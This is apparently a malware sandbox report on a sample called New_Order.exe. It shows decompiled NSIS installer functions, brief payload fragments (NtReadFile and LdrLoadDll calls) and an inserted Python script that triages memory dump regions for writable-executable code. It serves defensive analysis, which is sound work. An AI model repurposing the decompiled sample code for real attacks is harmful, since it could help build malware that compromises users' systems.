                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-823278215
                                                                        • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                        • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                        • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                        • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				int _t15;
                                                                        				long _t16;
                                                                        
                                                                        				// subclass window procedure: _a8 is the message, _a12/_a16 are wParam/lParam,
                                                                        				// *0x42a884 holds the original window procedure
                                                                        				_t15 = _a8;
                                                                        				if(_t15 != 0x102) { // 0x102 == WM_CHAR
                                                                        					if(_t15 != 0x200) { // 0x200 == WM_MOUSEMOVE
                                                                        						_t16 = _a16;
                                                                        						L7:
                                                                        						// 0x419 == WM_USER + 0x19; notify E00404B4E when the tracked value at *0x42a87c changes
                                                                        						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
                                                                        							_push(_t16);
                                                                        							_push(6);
                                                                        							 *0x42a87c = _t16;
                                                                        							E00404B4E();
                                                                        						}
                                                                        						L11:
                                                                        						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                                        					}
                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                        						L10:
                                                                        						_t16 = _a16;
                                                                        						goto L11;
                                                                        					}
                                                                        					// mouse moved over a visible window: look up the item under the cursor and
                                                                        					// re-dispatch as the 0x419 message handled at L7
                                                                        					_t16 = E00404ACE(_a4, 1);
                                                                        					_t15 = 0x419;
                                                                        					goto L7;
                                                                        				}
                                                                        				if(_a12 != 0x20) { // 0x20 == ' ' (space character)
                                                                        					goto L10;
                                                                        				}
                                                                        				// space pressed: handled by E004041C7 with 0x413, message swallowed
                                                                        				E004041C7(0x413);
                                                                        				return 0;
                                                                        			}





                                                                        • Statement addresses: 0x00405196, 0x004051a0, 0x004051bc, 0x004051de, 0x004051e1, 0x004051e7, 0x004051f1, 0x004051f2, 0x004051f4, 0x004051fa, 0x004051fa, 0x00405204, 0x00000000, 0x00405212, 0x004051c9, 0x00405201, 0x00405201, 0x00000000, 0x00405201, 0x004051d5, 0x004051d7, 0x00000000, 0x004051d7, 0x004051a6, 0x00000000, 0x00000000, 0x004051ad, 0x00000000

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004051C1
                                                                        • CallWindowProcA.USER32 ref: 00405212
                                                                          • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                        • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                        • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                        • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
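The dump-file names listed under Memory Dump Source encode each region's base address, page protection and region type, which is what tells an analyst whether a dumped region is read-only data, a writable data section or executable code. The Python below is an added example written for this page; it is not part of the report or of Joe Sandbox. It decodes those names and lists the regions worth opening first. It assumes the name layout <process index>.<dump stage>.<dump id>.<base address>.<protection>.<type>.sdmp: the last three fields are the ordinary winnt.h constants (PAGE_* and MEM_*), while the meaning of the first three is an assumption taken from the report layout. The input lines are copied from the record above, plus one constructed RWX region to exercise the injection-style finding.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Windows page-protection and region-type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of a dump file name (see lead-in):
#   <process index>.<dump stage>.<dump id>.<base address>.<protection>.<type>.sdmp
DUMP_NAME = re.compile(
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    stage: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:X}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE variants


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one dump file name; the name may be embedded in a longer report line."""
    m = DUMP_NAME.search(name)
    if not m:
        raise ValueError(f"not a dump file name: {name!r}")
    pi, st, did, base, prot, typ = m.groups()
    return DumpRegion(int(pi, 16), int(st, 16), int(did), int(base, 16), int(prot, 16), int(typ, 16))


def regions_from_report(lines: Iterable[str]) -> List[DumpRegion]:
    """Pull every dump name out of 'Source File:' / 'Associated:' report lines."""
    return [parse_dump_name(m.group(0)) for line in lines for m in DUMP_NAME.finditer(line)]


def triage(regions: List[DumpRegion]) -> List[str]:
    """Findings to check first: pages that are both writable and executable (code written
    and then run in place), and executable pages not backed by a mapped image file."""
    out = []
    for r in sorted(set(regions), key=lambda r: r.base):
        if r.executable and r.writable:
            out.append(f"{r.base:#010x} RWX ({r.protect_name}, {r.type_name})")
        elif r.executable and r.mem_type != 0x1000000:
            out.append(f"{r.base:#010x} executable but {r.type_name} ({r.protect_name})")
    return out


# Constructed input: the Memory Dump Source lines of the record above, plus one
# made-up PAGE_EXECUTE_READWRITE region (last line) that is not in the report.
REPORT_LINES = [
    "Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true",
    "Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp",
    "Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp",
    "Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp",
    "Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp",
    "Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp",
    "Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp",
    "Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp",
    "Associated: 00000000.00000002.999999999.0000000000A00000.00000040.00020000.sdmp",  # constructed
]

if __name__ == "__main__":
    for region in regions_from_report(REPORT_LINES):
        print(f"{region.base:#010x} {region.protect_name:<22} {region.type_name}")
    print("\n".join(triage(regions_from_report(REPORT_LINES))))
```

Run as-is it prints the decoded regions followed by the findings. The protections line up with the PE layout the report gives: 0x00400000 and 0x00408000 read-only (headers and .rdata), 0x00401000 execute-read (.text), the 0x0040A000 to 0x00435000 range read-write (data). On this report's own lines the second check also fires for 0x00401000, because the .text dump is recorded as MEM_PRIVATE rather than MEM_IMAGE; whether that is simply how the dumper labels a process's own image or reflects an image that was unmapped and rewritten is something to settle against the rest of the report, not from the file name alone.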

                                                                        C-Code - Quality: 90%
                                                                        			// Read a string value from the registry into a 1024-byte buffer (0x400 is
                                                                        			// NSIS_MAX_STRLEN). Matches the NSIS stub's myRegGetStr: _a4 = root key,
                                                                        			// _a8 = subkey, _a12 = value name, _a16 = output buffer, _a20 = 64-bit-view flag.
                                                                        			// The sbb/and/or sequence builds the access mask 0x20019 (KEY_READ), adding
                                                                        			// 0x100 (KEY_WOW64_64KEY) depending on _a20. The stack under APIs shows a call
                                                                        			// from 00406293 with root 0x80000002 (HKEY_LOCAL_MACHINE) and subkey
                                                                        			// Software\Microsoft\Windows\CurrentVersion, the key the NSIS stub reads its
                                                                        			// Program Files / Common Files locations from.
                                                                        			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                        				int _v8;
                                                                        				long _t21;
                                                                        				long _t24;
                                                                        				char* _t30;
                                                                        
                                                                        				asm("sbb eax, eax");
                                                                        				_v8 = 0x400;
                                                                        				// E00405F7D opens the key; on success the HKEY is stored back into _a20.
                                                                        				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                        				_t30 = _a16;
                                                                        				if(_t21 != 0) {
                                                                        					L4:
                                                                        					// Open failed, query failed or wrong value type: return an empty string.
                                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                                        				} else {
                                                                        					// _a8 is reused to receive the value type; _v8 is the buffer size in/out.
                                                                        					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                        					_t21 = RegCloseKey(_a20);
                                                                        					// Force NUL termination: RegQueryValueEx does not guarantee the stored
                                                                        					// REG_SZ data is terminated, so the last byte of the buffer is cleared.
                                                                        					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                        					// Only REG_SZ (1) and REG_EXPAND_SZ (2) are accepted as strings.
                                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}







                                                                        • Statement addresses: 0x00405fec, 0x00405fee, 0x00406006, 0x0040600b, 0x00406010, 0x0040604d, 0x0040604d, 0x00406012, 0x00406024, 0x0040602f, 0x00406035, 0x0040603f, 0x00000000, 0x00000000, 0x0040603f, 0x00406052

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,GHFGHFGHFDGDFGDFg,0042A070,?,?,?,00000002,GHFGHFGHFDGDFGDFg,?,00406293,80000002), ref: 00406024
                                                                        • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,?,0042A070), ref: 0040602F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 3356406503-2848008697
                                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                        • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                        • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Start a child process from a full command line and return its process handle,
                                                                        			// or 0 if CreateProcessA failed. Matches the NSIS stub's myCreateProcess (used by
                                                                        			// Exec/ExecWait): 0x42c098 is a static STARTUPINFOA, 0x44 is sizeof(STARTUPINFOA)
                                                                        			// and 0x4000000 is CREATE_DEFAULT_ERROR_MODE. The primary-thread handle is closed
                                                                        			// immediately because callers only ever wait on the process.
                                                                        			E00405796(CHAR* _a4) {
                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                        				int _t7;
                                                                        
                                                                        				0x42c098->cb = 0x44;
                                                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
                                                                        				if(_t7 != 0) {
                                                                        					CloseHandle(_v20.hThread);
                                                                        					return _v20.hProcess;
                                                                        				}
                                                                        				return _t7;
                                                                        			}





                                                                        • Statement addresses: 0x0040579f, 0x004057bf, 0x004057c7, 0x004057cc, 0x00000000, 0x004057d2, 0x004057d6

                                                                        Strings
                                                                        • Error launching installer, xrefs: 004057A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                        • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                        • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                        • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Unload every plug-in DLL the installer loaded and free the list that tracked them.
                                                                        			// *0x429854 heads a singly linked list whose nodes hold the next pointer at +0 and
                                                                        			// the module handle at +8. E0040385A(_t2, 0) runs first (the %TEMP% path on the
                                                                        			// stack, C:\Users\user\AppData\Local\Temp\, is where NSIS keeps extracted plug-ins);
                                                                        			// then each node's DLL is released with FreeLibrary, the node freed with GlobalFree,
                                                                        			// and finally the list head is cleared. The return value is whatever the last
                                                                        			// GlobalFree (or, with an empty list, E0040385A) returned.
                                                                        			E00403875() {
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t6;
                                                                        				void* _t8;
                                                                        
                                                                        				_t8 =  *0x429854;
                                                                        				_t3 = E0040385A(_t2, 0);
                                                                        				if(_t8 != 0) {
                                                                        					do {
                                                                        						_t6 = _t8;          // current node
                                                                        						_t8 =  *_t8;        // advance before the node is freed
                                                                        						FreeLibrary( *(_t6 + 8));
                                                                        						_t3 = GlobalFree(_t6);
                                                                        					} while (_t8 != 0);
                                                                        				}
                                                                        				 *0x429854 =  *0x429854 & 0x00000000;
                                                                        				return _t3;
                                                                        			}







                                                                        • Statement addresses: 0x00403876, 0x0040387e, 0x00403885, 0x00403888, 0x00403888, 0x0040388a, 0x0040388f, 0x00403896, 0x0040389c, 0x004038a0, 0x004038a1, 0x004038a9

                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                        • GlobalFree.KERNEL32 ref: 00403896
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-823278215
                                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Split a path at its last backslash, in place: the backslash is overwritten with
                                                                        			// NUL so the input buffer keeps the directory, and a pointer to the file-name part
                                                                        			// is returned. Matches the NSIS stub's trimslashtoend. CharPrevA steps back one
                                                                        			// (possibly multi-byte) character at a time. Edge case: with no backslash at all
                                                                        			// the loop stops at the first byte, the buffer becomes empty and buf+1 is returned.
                                                                        			// The stack under APIs shows it called from 00402F0D on the sample's own path,
                                                                        			// leaving C:\Users\user\Desktop in the buffer and returning New_Order.exe.
                                                                        			E00405AD6(char* _a4) {
                                                                        				char* _t3;
                                                                        				char* _t5;
                                                                        
                                                                        				_t5 = _a4;
                                                                        				_t3 =  &(_t5[lstrlenA(_t5)]);   // start at the terminating NUL
                                                                        				while( *_t3 != 0x5c) {           // 0x5c = '\\'
                                                                        					_t3 = CharPrevA(_t5, _t3);
                                                                        					if(_t3 > _t5) {
                                                                        						continue;
                                                                        					}
                                                                        					break;                       // reached the start of the buffer
                                                                        				}
                                                                        				 *_t3 =  *_t3 & 0x00000000;      // cut the string at the separator
                                                                        				return  &(_t3[1]);
                                                                        			}





                                                                        • Statement addresses: 0x00405ad7, 0x00405ae1, 0x00405ae3, 0x00405aea, 0x00405af2, 0x00000000, 0x00000000, 0x00000000, 0x00405af2, 0x00405af4, 0x00405af9

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405ADC
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405AEA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-1246513382
                                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                        • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                        • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Case-insensitive substring search: returns a pointer to the first occurrence of
                                                                        			// _a8 inside _a4, or 0 if there is none. Matches the NSIS stub's mystrstri.
                                                                        			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t15;
                                                                        				CHAR* _t17;
                                                                        				CHAR* _t27;
                                                                        
                                                                        				_t12 = lstrlenA(_a8);
                                                                        				_t27 = _a4;
                                                                        				_v8 = _t12;                          // needle length
                                                                        				// Stop once the remaining haystack is shorter than the needle.
                                                                        				while(lstrlenA(_t27) >= _v8) {
                                                                        					_t14 = _v8;
                                                                        					// Temporarily NUL-terminate the haystack after needle-length bytes so that
                                                                        					// lstrcmpiA compares exactly one window, then restore the byte. The NSIS
                                                                        					// source saves that byte in a register first; the decompiler renders the
                                                                        					// restore as a read of the already-cleared byte, which is a rendering
                                                                        					// artefact rather than the real data flow.
                                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                                        					if(_t15 == 0) {
                                                                        						_t17 = _t27;                 // match: return the window start
                                                                        					} else {
                                                                        						_t27 = CharNextA(_t27);      // advance one (possibly multi-byte) character
                                                                        						continue;
                                                                        					}
                                                                        					L5:
                                                                        					return _t17;
                                                                        				}
                                                                        				_t17 = 0;                            // no match
                                                                        				goto L5;
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                                        • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 37%
                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t18;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        
                                                                        				_t13 = _a4;
                                                                        				_t28 = _a4 + 0xc48;
                                                                        				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                        				_t6 =  &_a32; // 0x413d52
                                                                        				_t12 =  &_a8; // 0x413d52
                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                        				return _t18;
                                                                        			}

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                        				char* _v8;
                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                        				char _v536;
                                                                        				void* _t15;
                                                                        				intOrPtr* _t17;
                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                        				void* _t30;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_v8 =  &_v536;
                                                                        				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                        				_t31 = _t30 + 0xc;
                                                                        				if(_t15 != 0) {
                                                                        					_t17 = E0041AF70(__eflags, _v8);
                                                                        					_t32 = _t31 + 4;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						E0041B1F0(_t17,  &_v12, 0);
                                                                        						_t32 = _t32 + 8;
                                                                        					}
                                                                        					_t18 = E00419300(_v8);
                                                                        					_v16 = _t18;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                        						return _v16;
                                                                        					}
                                                                        					return _t18;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                        Memory Dump Source
